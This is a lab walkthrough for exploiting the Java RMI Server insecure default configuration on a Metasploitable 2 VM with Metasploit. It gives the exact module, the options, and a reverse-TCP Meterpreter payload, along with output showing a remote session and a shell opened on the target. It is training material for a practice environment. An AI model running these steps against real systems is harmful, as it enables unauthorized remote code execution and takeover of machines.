Java RMI Server Insecure Default Configuration RCE Vulnerability

Note: these labs are extremely oriented to the results, using a step-by-step guidance. During your progress, try to find more information and understand what you are doing.

Requirements

Kali Linux

The Kali Linux VM (or any other type of installation)

Metaploitable 2

The Metasploitable 2 VM

Metasploitable Framework

Metasploit Framework toolset (installed on Kali Linux by default)

Metasploitable 2 IP

The IP address of the Metasploitable 2 VM. In my case it is 192.168.8.142. This may be different in your specific case.

Kali Linux IP

The IP address of the Kali Linux machine. In my case it is 192.168.8.147. This may be different in your specific case.

Laboratory Workflow

The following describe the different steps to be conducted during the laboratory. You may introduce variations on this and learn from those variations.

1. Launch the Metasploit Framework

msfconsole

2. Search for the appropriate module

search java_rmi

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  Yes    Java RMI Server Insecure Default Configuration Java Code Execution
   2  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     No     Java RMI Server Insecure Endpoint Code Execution Scanner
   3  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalationhelp

3. Use the module

use exploit/multi/misc/java_rmi_server

4. Check the module options

options

Module options (exploit/multi/misc/java_rmi_server):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      1099             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL for incoming connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                     no        The URI to use for this exploit (default is random)

Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.8.147    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)

5. Set the appropriate options

set RHOSTS 192.168.8.142

RHOSTS => 192.168.8.142

6. Run the exploit

exploit

[*] Started reverse TCP handler on 192.168.8.147:4444 
[*] 192.168.8.142:1099 - Using URL: http://192.168.8.147:8080/UU6tSf5LVRd
[*] 192.168.8.142:1099 - Server started.
[*] 192.168.8.142:1099 - Sending RMI Header...
[*] 192.168.8.142:1099 - Sending RMI Call...
[*] 192.168.8.142:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.8.142
[*] Meterpreter session 3 opened (192.168.8.147:4444 -> 192.168.8.142:47995) at 2023-03-28 10:05:18 -0400

meterpreter >

7. Meterpreter session

Now you have a meterpreter session opened. This session will allow you to interact with the target.

meterpreter >

Look at the meterpreter help and check the possibilities.

help

Core Commands
=============

    Command       Description
    -------       -----------
    ?             Help menu
    background    Backgrounds the current session
    bg            Alias for background
    bgkill        Kills a background meterpreter script
    bglist        Lists running background scripts
    bgrun         Executes a meterpreter script as a background thread
    channel       Displays information or control active channels
    close         Closes a channel
    detach        Detach the meterpreter session (for http/https)
    disable_unic  Disables encoding of unicode strings
    ode_encoding
    enable_unico  Enables encoding of unicode strings
    de_encoding
    exit          Terminate the meterpreter session
    get_timeouts  Get the current session timeout values
    guid          Get the session GUID
    help          Help menu
    info          Displays information about a Post module
    irb           Open an interactive Ruby shell on the current session
    load          Load one or more meterpreter extensions
    machine_id    Get the MSF ID of the machine attached to the session
    pry           Open the Pry debugger on the current session
    quit          Terminate the meterpreter session
    read          Reads data from a channel
    resource      Run the commands stored in a file
    run           Executes a meterpreter script or Post module
    secure        (Re)Negotiate TLV packet encryption on the session
    sessions      Quickly switch to another session
    set_timeouts  Set the current session timeout values
    sleep         Force Meterpreter to go quiet, then re-establish session
    transport     Manage the transport mechanisms
    use           Deprecated alias for "load"
    uuid          Get the UUID for the current session
    write         Writes data to a channel

8. Open a shell on the target machine

shell

meterpreter > shell
Process 1 created.
Channel 1 created.

Video

Video that resumes everything on this laboratory.

Questions

Now that you have completed this exploitation try to answer to following:

Now, what can I do with the exploitation achieved?
Which type of privileges do I have on the exploited target?
How was this accomplished?
Try to learn more about this vulnerability.

PreviousdistCC RCE [CVE-2004-2687]NextVNC Brute Force Login

Last updated 2 years ago